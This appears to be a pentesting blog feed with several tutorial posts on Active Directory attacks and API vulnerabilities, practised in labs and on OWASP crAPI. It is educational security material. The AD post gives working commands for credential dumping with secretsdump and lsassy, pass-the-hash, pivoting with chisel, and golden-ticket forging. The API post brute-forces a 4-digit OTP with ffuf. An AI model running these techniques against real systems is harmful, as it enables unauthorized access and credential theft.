It&apos;s worth noting that concurrently, it&apos;s advisable to run Bloodhound to swiftly and effortlessly gather all domain information. Below is a Bloodhound-python command to collect this data (more information also included in the chapter I just commented):

```bash
bloodhound-python -u beruinsect -p &apos;Password1&apos; -ns 192.168.253.120 -d shadow.local -c all --zip 

```

# Privilege Escalation and Pivoting: Scaling Your Influence

Once we have gathered the necessary information and gained a comprehensive understanding of the domain, the next logical step is to attempt to escalate privileges on the machines. This allows us to explore the possibility of accessing additional information or even gaining control over the entire domain. BloodHound often provides valuable insights into potential privilege escalation paths, making it a crucial tool in our arsenal. Additionally, if we identify machines within the network to which we previously lacked access, pivoting to this new network can open up fresh opportunities for exploration.

Privilege escalation on machines typically revolves around four primary types of vulnerabilities:

1.  [DLL hijacking](https://www.kayssel.com/post/dll-hijacking/): DLL hijacking involves exploiting insecure loading mechanisms in Windows applications to execute malicious code by replacing a legitimate Dynamic Link Library (DLL) with a malicious one. When an application attempts to load a DLL, if the DLL is not found in the specified path, Windows searches several predefined directories, including the current working directory. Attackers can place a malicious DLL with the same name as the one expected by the application in a directory that is searched before the legitimate one, thereby causing the application to load the malicious DLL instead.
2.  [Unquoted Service Paths](https://www.kayssel.com/post/unquoted-service-path/): Unquoted service paths refer to a vulnerability where the path to an executable used by a Windows service does not have quotes around it. This can lead to unintended behavior when the service attempts to execute the executable. Specifically, if the path contains spaces and is not enclosed in quotes, Windows may interpret the executable&apos;s path incorrectly, potentially allowing an attacker to substitute a malicious executable in place of the intended one.
3.  [Exploiting Scheduled Tasks](https://www.kayssel.com/post/task-scheduler/): Exploiting scheduled tasks involves leveraging misconfigured or insecurely configured scheduled tasks in Windows to execute arbitrary commands or code with elevated privileges. Attackers can exploit weaknesses in the configuration of scheduled tasks to gain unauthorized access or execute malicious actions on the system.
4.  [SeImpersonatePrivilege](https://www.kayssel.com/post/seimpersonateprivilege/): SeImpersonatePrivilege is a user right that allows a process to impersonate any token that has the &quot;Impersonate a client after authentication&quot; user right. This privilege is often assigned to services or processes that require the ability to impersonate a client&apos;s security context, such as server applications that handle client requests. However, if this privilege is misconfigured or granted unnecessarily, it can be exploited by attackers to impersonate other users or escalate their privileges within the system. Attackers may abuse this privilege to gain unauthorized access to sensitive resources or execute malicious actions while masquerading as legitimate users or processes.

Additionally, I recently authored three privilege escalation techniques leveraging common groups in Active Directory environments.

[Three Keys to the Kingdom: Uncovering the Roles of Account Operators, Backup Operators, and Event Log Readers in Offensive Security](https://www.kayssel.com/post/interesting-groups-ad/)

As for pivoting, I prefer using chisel due to its convenience and reliability. Specifically, I opt for dynamic remote port forwarding, which I find to be the most comfortable and firewall-friendly approach.

&lt;details&gt;
&lt;summary&gt;To set up chisel on the server side:&lt;/summary&gt;

```bash
chisel_linux server -p 1234 -reverse
```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;And on the client side for Windows:&lt;/summary&gt;

```bash
chisel_windows.exe client &lt;ServerIP&gt;:1234 R:&lt;LocalSOCKSPort&gt;:socks
```
&lt;/details&gt;


For more information and techniques I leave you the next chapter of the series:

[Mastering Active Directory Pivoting: Advanced Techniques and Tools](https://www.kayssel.com/post/pivoting-1/)

# Credential Dumping and Lateral Movement: Expanding Your Foothold

Once we&apos;ve obtained a user with elevated privileges on a machine, the next logical step is to attempt to extract all possible credentials stored on that machine. This enables us to facilitate lateral movement within the network using the newly acquired credentials, or in more advanced cases, to even extract the domain database (NTDS) if we&apos;ve obtained administrator credentials.

One of the most convenient tools for this task is secretsdump, as it simplifies the remote credential dumping process:

```bash
impacket-secretsdump &lt;user&gt;@&lt;ip&gt;

```

However, there are various other tools and techniques available, such as the popular Mimikatz. You can explore the different credential dumping techniques in detail in the dedicated chapter of our series:

[Windows Authentication Deep Dive: Unveiling Protocols, Credential Storage, and Extraction Techniques](https://www.kayssel.com/post/active-directory-4-secrets-in-windows-systems/)

If you manage to obtain NTLM hashes through the credential dump, you can utilize them for lateral movement using the Pass the Hash technique. Pass the Hash involves using the captured NTLM hashes to authenticate and gain access to other machines within the network without needing the plaintext passwords.

```bash
impacket-psexec beruinsect@192.168.253.131 -hashes &quot;:c4b0e1b10c7ce2c4723b4e2407ef81a2&quot;

```

Additionally, &quot;[Over Pass The Hash](https://www.kayssel.com/post/kerberos/#mastering-over-pass-the-hash-in-kerberos-authentication)&quot; serves as a sophisticated lateral movement technique beyond the conventional Pass the Hash approach. It involves the strategic use of a compromised user&apos;s NTLM hash or AES keys to request Kerberos TGT tickets. This advanced method is pivotal for executing privilege escalation and lateral movement within a target system. By exploiting the Kerberos authentication protocol, attackers can seamlessly traverse the network, accessing various resources without the need for the actual user&apos;s plaintext password.

```bash
impacket-getTGT shadow.local/ironhammer -hashes :7247e8d4387e76996ff3f18a34316fdd -dc-ip 192.168.253.130

export KRB5CCNAME=/home/rsgbengi/Desktop/lab/kerberos/ironhammer.ccache
impacket-psexec -dc-ip 192.168.253.130 -target-ip 192.168.253.131 -no-pass -k shadow.local/ironhammer@pc-beru.shadow.local

```

Another key strategy for lateral movement is leveraging Kerberos tickets, known as [Pass the Ticket](https://www.kayssel.com/post/kerberos/#understanding-pass-the-ticket-in-kerberos-authentication). This technique utilizes Kerberos tickets obtained from compromised accounts, allowing attackers to authenticate and gain access to other network resources seamlessly, thus bypassing the need for plaintext passwords.

```bash
lsassy -d shadow.local -u ironhammer -p Password4 192.168.253.131 -K tickets
export KRB5CCNAME=/home/rsgbengi/Desktop/lab/kerberos/tickets/beru.ccache

```

Achieving domain administrator credentials marks a significant milestone, as it grants complete control over the domain. With such access, the secretsdump command can be used to extract the NTDS, unlocking access to all users and machines within the domain. This chapter has detailed various techniques for extracting the domain database, highlighting their importance in the context of network penetration and control.

[Unveiling the Secrets of Domain Controllers: A Journey into Active Directory Security](https://www.kayssel.com/post/active-directory-2-computers/)

# Domain Dominance: Establishing Control

This final phase is not typically part of standard pentesting procedures and is often more relevant to red teams seeking to establish persistence within a domain. Nonetheless, I&apos;ve included it because I believe it represents the pinnacle of what can be achieved in Active Directory auditing.

Firstly, we have what is commonly known as a &quot;Silver Ticket&quot;. This type of ticket is utilized to maintain persistent access to a specific service within the Active Directory environment. To create a Silver Ticket, one requires the NT hash of the account running the targeted service. This technique proves particularly valuable in scenarios where access to services such as CIFS or LDAP on a domain controller has been obtained.

The second option is known as a &quot;Golden Ticket&quot;, which, as the name suggests, is even more powerful than the Silver Ticket. Unlike the Silver Ticket technique, creating a Golden Ticket requires compromising the entire domain or obtaining the NT hash of the user krbtgt, which is necessary for forging this type of ticket.

With a Golden Ticket, an attacker can fabricate tickets for any service on any machine within the domain, granting unparalleled access and control, thus making it an exceptionally potent technique.

To illustrate, you can use tools like `impacket-ticketer` to generate a Golden Ticket by providing the domain SID and the NT hash of the krbtgt user:

```bash
impacket-ticketer -domain-sid S-1-5-21-1545742773-2923955266-673312136 -nthash 011948128d80ec39af3a837c5d153dea -domain shadow.local administrator
```

After generating the Golden Ticket, you can use it to authenticate and gain access to machines within the domain. For example, you can use `impacket-psexec` to execute commands on a target machine:

```bash
export KRB5CCNAME=/home/rsgbengi/Desktop/lab/kerberos/administrator.ccache
impacket-psexec -dc-ip 192.168.253.130 -target-ip 192.168.253.130 -no-pass -k shadow.local/administrator@dc-shadow.shadow.local
```

For both techniques, you can refer to the following link for further information:

[Decoding Kerberos: Understanding the Authentication Process and Main Attacks](https://www.kayssel.com/post/kerberos/)

# Conclusion

In traversing the depths of Active Directory auditing, we&apos;ve embarked on a journey from foundational concepts to advanced techniques, delving into the intricacies of network penetration and control. This series has been crafted with the aim of equipping junior pentesters with the essential knowledge to conduct proficient audits while providing references for further exploration.

By navigating through the various phases outlined in this article, you&apos;ve gained a comprehensive understanding of Active Directory auditing. From basic reconnaissance to privilege escalation and lateral movement, each step has been meticulously detailed, allowing you to navigate the complex landscape of network security with confidence.

Furthermore, the inclusion of advanced techniques such as DLL hijacking, Pass the Hash, and Golden Ticket forging illustrates the depth of knowledge required to achieve domain dominance. While these methods may not align with standard pentesting procedures, their inclusion underscores the significance of persistence within a domain environment.

As you continue to hone your skills in Active Directory auditing, I encourage you to leverage the wealth of resources provided throughout this series. Whether it&apos;s setting up your own lab environment or exploring specialized tools like BloodHound and LaZagne, the possibilities for learning and growth are endless.

In closing, I trust that this series has empowered you to navigate the complexities of Active Directory with ease, laying the foundation for a successful career in cybersecurity. Remember, knowledge is the key to resilience in the ever-evolving landscape of network security. Keep exploring, keep learning, and never cease to push the boundaries of your expertise.

Happy auditing!</content:encoded><author>Ruben Santos</author></item><item><title>API Security Under the Microscope: Unmasking Mass Assignment and Broken User Authentication</title><link>https://www.kayssel.com/post/mass-assignment-broken-user-auth</link><guid isPermaLink="true">https://www.kayssel.com/post/mass-assignment-broken-user-auth</guid><description>This chapter delves into Mass Assignment and Broken User Authentication, offering insights on identifying and mitigating these API vulnerabilities. Gain strategies to secure your digital assets and enhance your cybersecurity posture.</description><pubDate>Sun, 04 Feb 2024 15:26:56 GMT</pubDate><content:encoded># Introduction

Welcome to the latest chapter in our API hacking series, where we dive deep into Mass Assignment and Broken User Authentication vulnerabilities. Having explored the essentials of API security, this installment takes a closer look at these specific threats, offering insights into their detection and mitigation. We&apos;ll break down Mass Assignment&apos;s potential for unauthorized data manipulation and tackle the challenges of securing user authentication processes. Through practical examples and strategic advice, this chapter aims to arm you with the necessary tools and knowledge to enhance the security of your APIs, ensuring a robust defense against these common but critical vulnerabilities. Let&apos;s embark on this journey to fortify our digital fortresses.

# **Mass Assignment: The Hidden Pitfall in API Security**

Beginning with Mass Assignment, we delve into a subtle yet perilous vulnerability in API security. This risk arises when applications blindly trust user input, linking it directly to object properties and creating a potential backdoor for attackers. Such a flaw can lead to unauthorized modifications and system access, underlining the need for vigilant input handling and validation protocols.

## **Unveiling the Threat: A Closer Look at the Impact**

The consequences of Mass Assignment can be severe, ranging from data breaches to privilege escalations. It’s not just about changing a user&apos;s role or accessing sensitive data; it&apos;s about the potential havoc an attacker could wreak through a single overlooked vulnerability.

## **Detection and Prevention: Safeguarding Your API**

The detection of this vulnerability typically involves examining parameters within the responses of legitimate requests or making educated guesses about potential parameters a request might contain. For instance, in a login portal that collects a username and password, a parameter such as &apos;isAdmin&apos; could be manipulated and set to &apos;true&apos; to elevate privileges. As penetration testers, we might intentionally guess or identify such parameters either through our own exploration or by noticing them in requests or responses generated by the application.

## **Exploring Mass Assignment: crAPI Examples**

### **First Example: The Simple Case**

As we advance in our exploration, building on the insights from the previous chapter, our investigation takes a significant turn when we experiment with changing the name of a video uploaded by a user. This process unveils a critical aspect of server interaction—how it responds with various parameters upon receiving our request.

![](/content/images/2024/01/image-74.png)

Change name

![](/content/images/2024/01/image-76.png)

Parameters of the request

A pivotal point in our analysis is the examination of the Mass Assignment vulnerability. Our methodical testing aims to uncover if parameters, when included in the request, are echoed back in the server&apos;s response, potentially altered. Among the parameters tested, including the &apos;id&apos; in hopes of altering access to other videos, it was the &apos;conversion\_params&apos; parameter that stood out. This parameter, responsible for setting the video&apos;s conversion settings, proved to be susceptible to Mass Assignment. By modifying &apos;conversion\_params&apos; in our request, we observed a direct alteration in the response. This finding not only demonstrates the vulnerability to Mass Assignment but also underscores the importance of scrutinizing how server responses reflect the changes made to request parameters, thereby influencing the video conversion process.

![](/content/images/2024/01/image-77.png)

Change of vidio conversion by Mass Asignment

This initial example, though appearing simple at first glance, serves as a potent illustration of the ease with which Mass Assignment vulnerabilities can be exploited. This is true even in settings that might initially seem harmless or secure.

### Second Example: The intricate Case

Now, let&apos;s shift our focus to a more complex scenario in an online store setting. Imagine selecting and purchasing an item, which then generates a unique identifier for the transaction. This process, while common, can reveal a lot about the underlying API structure and potential vulnerabilities:

![](/content/images/2024/01/image-64.png)

Product Purchase

![](/content/images/2024/01/image-66.png)

Product purchase request

Upon reviewing the order, we uncover not just details about the item, but also various methods that the API permits. This is where our exploration takes an interesting turn:

![](/content/images/2024/01/image-68.png)

Permitted methods

An initial experiment might involve switching the method to POST to investigate whether we can modify parameters within the previously received response, such as the &apos;status&apos; or the purchase ID. In this scenario, I introduced the &apos;status&apos; parameter, only to find that the system also requires the &apos;Product\_id&apos; and &apos;quantity&apos; to be specified. However, despite including these additional details, it appears that the backend does not interpret this test. Consequently, it seems that with the POST method, our ability to make changes is limited.

![](/content/images/2024/01/image-69.png)

Method change to POST

Conversely, should we make the adjustment to the request method by switching to PUT and incorporating the &apos;status&apos; parameter, we may encounter a novel error within the server&apos;s response. Specifically, this error will shed light on the potential statuses a product can assume: &apos;Delivered,&apos; &apos;Return Pending,&apos; or &apos;Returned.&apos; At this juncture, the most intriguing choice would be to explore the &apos;Returned&apos; option. By doing so, not only would we receive a refund for the product&apos;s cost, but since the product is already in the shipping process, we would also obtain the item itself for free.

![](/content/images/2024/01/image-70.png)

Request using Put method

This unexpected turn of events, where altering the status to &apos;returned&apos; results in an unforeseen refund, serves as a remarkable illustration of Mass Assignment in action. It underscores how even a seemingly minor status modification can carry significant financial consequences:

![](/content/images/2024/01/image-72.png)

Change of status

![](/content/images/2024/01/image-73.png)

We earn 10 dollars

# **Broken User Authentication: Unveiling the Chink in Our Digital Armor**

After unveiling the intricacies of Mass Assignment vulnerabilities, our journey through the API security landscape propels us towards another formidable challenge: Broken User Authentication. This peril emerges when authentication mechanisms are misconfigured or poorly implemented, leaving a crack in our digital armor through which attackers can slip, assuming identities not their own.

## **The Crux of Broken User Authentication**

Imagine a fortress where the gates occasionally recognize the enemy as a friend, allowing them access to the most guarded secrets. This is the reality of Broken User Authentication - a scenario where attackers exploit weak spots in authentication processes to gain unauthorized access to user accounts, personal data, and privileged information. The repercussions can range from data breaches to complete account takeover, casting a long shadow over the integrity of digital services.

## **Detecting and Diagnosing the Breach**

Start by thoroughly analyzing the authentication process, paying close attention to any potential weaknesses in password management, session handling, or security questions. Delve into the application&apos;s responses to legitimate requests, as well as any hints or anomalies that could hint at vulnerabilities. Additionally, attempt educated guesses by manipulating parameters or credentials to uncover potential access issues. Remember, while automated tools are valuable, your human intuition and ability to spot subtle irregularities can be the key to exposing this critical security weakness.

## **Fortifying the Ramparts: Mitigation Strategies**

The key to mitigating Broken User Authentication lies in embracing best practices for secure authentication. Implementing multi-factor authentication (MFA), ensuring robust password policies, and securing session management are the cornerstones of a fortified defense. Regularly updating and auditing authentication mechanisms also ensure that the security measures evolve in tandem with emerging threats.

## **Navigating the Maze of Password Changes**

Venturing into the realm of user authentication, let&apos;s dissect the password change process. Initially, upon submitting an email, we&apos;re informed that a verification code, a guardian of our digital identity, is dispatched to our inbox.

![](/content/images/2024/01/image-49.png)

Password change functionality

![](/content/images/2024/01/image-50.png)

Password change request

![](/content/images/2024/01/image-51.png)

OTP generated

Upon retrieving the code, a successful entry acts as the key to altering our password, a crucial step in securing our digital persona.

![](/content/images/2024/01/image-52.png)

Successful change

However, a closer inspection of the password change mechanism reveals a critical vulnerability. Repeated trials expose the code as a mere 4-digit barricade. This simplicity beckons the question of its susceptibility to brute force attacks, threatening the sanctity of user accounts.

![](/content/images/2024/01/image-53.png)

OTP verification request

Imagine targeting a known user, &apos;beruinsect&apos;. Knowing their email allows us to embark on a quest to reset their password.

![](/content/images/2024/01/image-54.png)

Change of password to Beru

Employing tools like Burp Intruder, we simulate a brute force siege, attempting all combinations from 0000 to 9999, a testament to perseverance and cunning.

![](/content/images/2024/01/image-55.png)

Data entered

![](/content/images/2024/01/image-56.png)

Request on Burp Intruder

![](/content/images/2024/01/image-62.png)

Intruder configuration

Our efforts bear fruit, revealing a glaring absence of defenses against such brute force invasions. The response size betrays the correct OTP, allowing us to usurp control over the account.

![](/content/images/2024/01/image-61.png)

Successful brute force attack

For those without the luxury of Burp Pro, alternative tools like FFUF offer a swifter path to victory, showcasing the adaptability of a modern hacker.

```bash
seq -w 0000 9999 &gt; numbers.txt

```

```bash
ffuf -request brute.txt -w numbers.txt -request-proto http -replay-proxy http://127.0.0.1:8080 -ms 200

```

-   `-w` specifies the wordlist for fuzzing, targeting various inputs.
-   `-request` allows for custom request templates, giving flexibility in crafting test cases.
-   `-request-proto` sets the request protocol, crucial for distinguishing between HTTP and HTTPS.
-   `-replay-proxy` directs traffic through a proxy, integrating seamlessly with tools like Burp Suite for in-depth analysis.
-   `-ms` filters responses by size, pinpointing anomalies that could indicate vulnerabilities.

A final word of caution: this vulnerability also opens the door to user enumeration, as the application&apos;s response to non-existent emails unveils potential targets. Moreover, through a brute-force attack using a wordlist of commonly known usernames, malicious actors could potentially identify users of the application, creating an opportunity to change their passwords indiscriminately.

![](/content/images/2024/01/image-63.png)

User Enumeration

# Conclusion

As we close this chapter on Mass Assignment and Broken User Authentication, it&apos;s clear that the path to securing APIs is both challenging and crucial. Through exploring these vulnerabilities, we&apos;ve uncovered not just the risks they pose, but also the strategies to mitigate them. Remember, the key to enhancing API security lies in understanding the threats, vigilance in monitoring, and continuous improvement of defenses. Armed with the knowledge shared in this series, you&apos;re better equipped to protect your digital assets against these pervasive security challenges. Let&apos;s continue to fortify our APIs, one vulnerability at a time.</content:encoded><author>Ruben Santos</author></item><item><title>Securing the Gates: Mastering BOLA and BFLA in API Security</title><link>https://www.kayssel.com/post/bola-and-bfla</link><guid isPermaLink="true">https://www.kayssel.com/post/bola-and-bfla</guid><description>Explore BOLA and BFLA in API security. Uncover how BOLA leads to unauthorized data access and BFLA allows executing restricted functions. Through practical demonstrations with OWASP&apos;s crAPI, understand the critical need for stringent authorization in APIs.</description><pubDate>Sun, 28 Jan 2024 19:07:30 GMT</pubDate><content:encoded># **Introduction**

Welcome to our ongoing exploration of API security, a journey into the heart of digital safeguards. In this chapter, we turn the spotlight on two pivotal yet often underappreciated vulnerabilities: Broken Object Level Authorization (BOLA) and Broken Function Level Authorization (BFLA). Building on our insights from [JWT](https://www.kayssel.com/post/api-hacking-2-2/), we&apos;ll dive deeper, unraveling the complexities of BOLA and BFLA. Join me as we dissect these vulnerabilities through a blend of theoretical insights and practical demonstrations using OWASP&apos;s crAPI. Whether you&apos;re a seasoned developer or a budding security enthusiast, this chapter promises to enrich your understanding and equip you with the tools to enhance your API defenses.

# **Understanding Broken Object Level Authorization (BOLA)**

Let&apos;s dive into the world of BOLA - a sneaky security flaw that&apos;s like a wolf in sheep&apos;s clothing in the realm of API security. Imagine a club bouncer who forgets to check IDs; that&apos;s BOLA for you. It lets uninvited guests sneak into places they shouldn&apos;t be. Now, think about this: If you were to assess an API you are familiar with, where do you think BOLA vulnerabilities might exist? How would these vulnerabilities impact the overall security of the application?

## What Exactly is BOLA?

Think of BOLA as a digital loophole. It&apos;s when an app is a bit too trusting, letting users peek into data that&apos;s not meant for their eyes. This is especially risky when we&apos;re talking about sensitive info like personal or financial data.

## How Does BOLA Sneak Up?

BOLA is like leaving your car unlocked with the keys inside. It happens when APIs don&apos;t ask, &quot;Hey, should you really be here?&quot; when users request access to specific data. The main culprits? Not being strict enough with permissions and forgetting to double-check if a user should access certain info.

## The Ripple Effect of BOLA

Imagine if someone could read your diary or access your bank details - scary, right? That&apos;s the kind of drama BOLA can cause. It can lead to privacy nightmares, data theft, and even let hackers play puppeteer with other people&apos;s accounts.

## Spotting BOLA in the Wild

Finding BOLA requires playing detective - scrutinizing how APIs handle access to data. It&apos;s about testing every nook and cranny, using different user hats, and seeing if you can sneak a peek at data that&apos;s supposed to be off-limits.

## **A Practical Exploration of BOLA with OWASP crAPI**

Our journey through crAPI starts with a familiar task after logging in: adding vehicles to our dashboard. Simply click &quot;Click Here,&quot; and an email wings its way to you via Mailhog. To peek at this email, just head over to Mailhog&apos;s web interface. It&apos;s easy - type `http://[ip of crapi]:8025/` into your browser, and you&apos;re in!

![](/content/images/2024/01/image-46.png)

Link to add vehicle

![](/content/images/2024/01/image-26.png)

Mailhog

![](/content/images/2024/01/image-24.png)

Vehicle details

What&apos;s next? That &apos;refresh info&apos; button on our new vehicle is more than just a button - it&apos;s a gateway to hidden data, revealing not just the car&apos;s location but also an intriguing endpoint identifier.

![](/content/images/2024/01/image-27.png)

Car added

![](/content/images/2024/01/image-28.png)

Car ID

Here, we introduce &quot;Firefox Containers,&quot; a nifty Firefox extension that allows for multiple browser sessions in isolated tabs. This means we can log into different user accounts simultaneously without logging out, perfect for testing authorization without the hassle of juggling multiple browsers or incognito windows.

[Firefox Multi-Account Containers – Get this Extension for 🦊 Firefox (en-US)](https://addons.mozilla.org/en-US/firefox/addon/multi-account-containers/)

![](/content/images/2024/01/image-32.png)

Firefox&apos;s containers with two different users

By intercepting the vehicle data refresh request in Burp and altering the car identifier, we step into another user&apos;s shoes, viewing their car data. This is BOLA in action, a clear demonstration of why proper authorization checks are crucial.

![](/content/images/2024/01/image-47.png)

Change of identifier

# **Breaking Down Broken Function Level Authorization (BFLA)**

Following our exploration of BOLA, we now pivot to another crucial aspect of API security vulnerabilities: Broken Function Level Authorization (BFLA). BFLA is akin to having a master key in the wrong hands. It occurs when users are able to execute functions that are out of bounds for their access level, potentially leading to severe security breaches. Reflect for a moment: Why do you think securing each function within an API is crucial, and how might overlooking this lead to significant security risks?

## Understanding BFLA

Broken Function Level Authorization (BFLA) is a vulnerability where users gain unauthorized access to functions within an API. It&apos;s like someone having a key to rooms they&apos;re not supposed to enter. In an API context, this means users can perform actions or access functionalities that should be restricted, often due to insufficient validation of user permissions at the function level.

## How BFLA Manifests in APIs

BFLA often shows up in scenarios where API endpoints handle sensitive operations - like changing user roles, accessing administrative features, or modifying critical data. These endpoints, if not properly secured, become weak links, allowing users to execute functions beyond their permission scope. It&apos;s a subtle flaw, as it doesn&apos;t block access entirely but allows unauthorized actions within allowed sessions.

## The Consequences of Ignoring BFLA

The impact of overlooking BFLA can be profound. It ranges from data breaches, where sensitive information is altered or stolen, to complete system compromises. In the worst cases, BFLA can enable attackers to escalate their privileges within the system, potentially gaining administrative control. This highlights why ensuring function-level security is as crucial as securing the data objects themselves.

## Identifying BFLA in Practice

We begin our BFLA journey where we left off - navigating the user profile. Among various options, the video upload feature catches our eye as a potential vulnerability hotspot.

![](/content/images/2024/01/image-48.png)

Profile of the user

Upon uploading a video, a unique ID is generated, a seemingly mundane but crucial detail in our investigation.

![](/content/images/2024/01/image-34.png)

Request uploading video

Our curiosity leads us to experiment with video modifications. Changing the video&apos;s name, we notice the request includes a &quot;videoName&quot; parameter, revealing the video&apos;s details and the endpoint&apos;s ID.

![](/content/images/2024/01/image-35.png)

Rename the video

![](/content/images/2024/01/image-36.png)

Request to change the name

Next, we switch gears and upload a video as a different user, using Firefox Containers for seamless session management, observing the new video&apos;s ID.

![](/content/images/2024/01/image-37.png)

Request to upload a video of the other user

Returning to our original user, we play with the newfound ID, first attempting a straightforward ID swap in the request endpoint, which, as seen in the image, doesn&apos;t yield the desired result.

![](/content/images/2024/01/image-38.png)

Change of ID in the request

Exploring further, we recall techniques from previous chapters, like tweaking the JWT. However, this path also hits a dead end, with the token flagged as invalid.

![](/content/images/2024/01/image-39.png)

User change at JWT

We then test adding the ID directly to the request body, a method to be explored in future chapters, which unfortunately doesn&apos;t work here.

![](/content/images/2024/01/image-40.png)

We add parameter to the request

Our journey takes an interesting turn when we experiment with different request methods. Switching to DELETE, we unearth a clue - a response indicating that this action is reserved for administrators.

![](/content/images/2024/01/image-42.png)

Change request method

Despite various attempts, including changing the API version, our breakthrough comes when we replace &apos;user&apos; with &apos;admin&apos; in the request. This subtle yet powerful change allows us to delete another user&apos;s video, successfully exposing the BFLA vulnerability.

![](/content/images/2024/01/image-43.png)

We change the endpoint version

![](/content/images/2024/01/image-44.png)

We change from &quot;user&quot; to &quot;admin&quot;

![](/content/images/2024/01/image-45.png)

Unable to access the video because it is deleted

# **Conclusion**

As we wrap up our exploration of BOLA and BFLA in API security, I can&apos;t help but reflect on how these vulnerabilities highlight the intricate challenges we face in safeguarding our digital world. It&apos;s a journey that requires not just technical expertise, but also a keen sense of vigilance and responsibility.

**Key Takeaways:**

-   **BOLA&apos;s Challenge**: The necessity for robust permission checks to prevent unauthorized data access.
-   **The Intricacies of BFLA**: The importance of securing each function within an API to prevent unauthorized actions.
-   **Practical Insights**: Our hands-on experience with OWASP&apos;s crAPI illuminated these vulnerabilities in a real-world context.

Looking forward, I&apos;m excited to guide you through our next topics: Mass Assignment and the potential vulnerabilities in resetting another user&apos;s password. These areas are crucial in our continuous endeavor to understand and strengthen API security.</content:encoded><author>Ruben Santos</author></item><item><title>Three Keys to the Kingdom: Uncovering the Roles of Account Operators, Backup Operators, and Event Log Readers in Offensive Security</title><link>https://www.kayssel.com/post/interesting-groups-ad</link><guid isPermaLink="true">https://www.kayssel.com/post/interesting-groups-ad</guid><description>Discover the roles of Account Operators, Backup Operators, and Event Log Readers in Active Directory security. Learn about their privileges, vulnerabilities, and ethical ways to manage and mitigate risks in our comprehensive series.</description><pubDate>Sun, 21 Jan 2024 18:15:10 GMT</pubDate><content:encoded># Introduction: Continuing Our Journey Through Active Directory Security

Welcome back to our insightful series on Active Directory (AD) security. In this chapter, we shift our focus to explore the roles of Account Operators, Backup Operators, and Event Log Readers. While this chapter stands on its own, it complements our previous discussions, such as the one on SeImpersonatePrivilege, under the broad theme of privilege escalation in AD environments.

As we delve into these new roles, we&apos;ll uncover their unique implications in network security, building on the general principles of AD security that we&apos;ve been exploring throughout this series.

#### Highlights of This Chapter:

-   **Role-Specific Insights**: Gain an in-depth understanding of Account Operators, Backup Operators, and Event Log Readers.
-   **Practical Applications**: Explore real-world scenarios and lab demonstrations highlighting these roles.
-   **Ethical Security Practices**: Continue our emphasis on responsible and ethical approaches to managing AD security challenges.

Join us as we further navigate the complex and ever-evolving landscape of Active Directory security, enhancing your skillset and understanding with each chapter.

# Understanding the Key Players in Active Directory Security: Account Operators, Backup Operators, and Event Log Readers

In the intricate world of Active Directory (AD) security, certain user groups play pivotal roles that are often overlooked. Among these, Account Operators, Backup Operators, and Event Log Readers stand out for their unique access and privileges. Let&apos;s explore their functionalities and the security implications they carry.

## Account Operators: The Frontline of User Management

-   **Role Overview**: Account Operators are pivotal in managing user accounts and groups within a domain. They have the power to create, modify, and delete accounts, except for those in highly privileged groups.
-   **Security Perspective**: While they don&apos;t have domain-wide carte blanche, their ability to impact user accounts makes them a potential target for exploitation. An attacker gaining access to an Account Operator account could manipulate user credentials, escalating their reach within the network.

## Backup Operators: The Silent Guardians with Potent Powers

-   **Functionality**: As their name suggests, Backup Operators are entrusted with backing up and restoring files, regardless of security permissions. They have unrestricted access to all files for these purposes.
-   **The Flip Side**: This “pass” through security permissions is a double-edged sword. An attacker with Backup Operator privileges could potentially access sensitive data or systems, making this group a less conspicuous yet critical target for privilege escalation.

## Event Log Readers: The Overlooked Watchers

-   **Their Domain**: Event Log Readers have the ability to view event logs on local and remote machines within the network. These logs contain critical information about system operations, security incidents, and other key events.
-   **Potential Risks**: While seemingly benign, the information in event logs can be a treasure trove for attackers. By gaining access to these logs, an attacker can gather intelligence about the network&apos;s security posture, identify potential vulnerabilities, and plan further attacks. The oversight of this group&apos;s capabilities can often lead to undervalued security risks.

# Methods of Privilege Escalation: Navigating the Vulnerabilities

In this section, we delve into the specific methods by which each of the three focused groups in Active Directory – Account Operators, Backup Operators, and Event Log Readers – can be exploited for privilege escalation. We&apos;ll explore the technical vulnerabilities and provide hypothetical scenarios to illustrate these risks.

## Preparing Your Lab Environment for Privilege Escalation Testing

As we venture into the fascinating world of privilege escalation in Active Directory, it&apos;s essential to have a playground where we can safely experiment and learn. Here&apos;s your step-by-step guide to setting up your own cybersecurity lab environment, ensuring a risk-free space for your explorations.

#### Step 1: Adding Users to Key Groups

In your lab&apos;s domain controller, with administrator privileges, you can add a user to our groups of interest - Account Operators, Event Log Readers, and Backup Operators. Fire up your PowerShell and enter the following commands:

```powershell
Add-ADGroupMember -Identity &quot;Account Operators&quot; -Members &quot;YourUsername&quot;
Add-ADGroupMember -Identity &quot;Event Log Readers&quot; -Members &quot;YourUsername&quot;
Add-ADGroupMember -Identity &quot;Backup Operators&quot; -Members &quot;YourUsername&quot;
```

_Replace &quot;YourUsername&quot; with the actual username you&apos;re adding._

#### Step 2: Preparing Other Machines in Your Domain

If you&apos;re not on the domain controller, no worries! You can still set things up from another machine in your domain. Make sure you have admin rights, and then run these commands to get the necessary tools:

```powershell
Import-Module ActiveDirectory
Install-WindowsFeature RSAT-AD-PowerShell

Add-ADGroupMember -Identity &quot;Account Operators&quot; -Members &quot;YourUsername&quot;
Add-ADGroupMember -Identity &quot;Event Log Readers&quot; -Members &quot;YourUsername&quot;
Add-ADGroupMember -Identity &quot;Backup Operators&quot; -Members &quot;YourUsername&quot;

```

#### Step 3: Tidying Up After Testing

After you&apos;ve completed your tests and learned some cool stuff, it&apos;s important to keep your lab tidy. Here’s how you can remove users from the groups easily:

```powershell
Remove-ADGroupMember -Identity &quot;Account Operators&quot; -Members &quot;YourUsername&quot; -Confirm:$false

```

## Simulating a Real-World Scenario: Accessing a Machine via RDP

Now that our lab is set up, let&apos;s add a dash of realism to our cybersecurity adventure. Imagine a scenario where a malicious user, through some cunning or luck, manages to get their hands on user credentials. Their goal? To access one of your machines via Remote Desktop Protocol (RDP). How would they proceed?

For our simulation, we&apos;ll use a Linux environment to initiate an RDP session. Here&apos;s the command you&apos;ll need, but remember, this is just for our controlled lab scenario:

```bash
xfreerdp /u:beruinsect &apos;/p:Password1&apos; /d:shadow.local /v:192.168.20.152 /dynamic-resolution +clipboard
```

In this command:

-   `/u:beruinsect` specifies the username.
-   `/p:Password1` is where you&apos;d put the password (change &apos;Password1&apos; to the actual password).
-   `/d:shadow.local` is the domain.
-   `/v:192.168.20.152` is the IP address of the machine you&apos;re accessing.
-   `/dynamic-resolution` and `+clipboard` are additional options for a better remote experience.

## Simulating Account Operators&apos; Privileges in Your Cybersecurity Lab

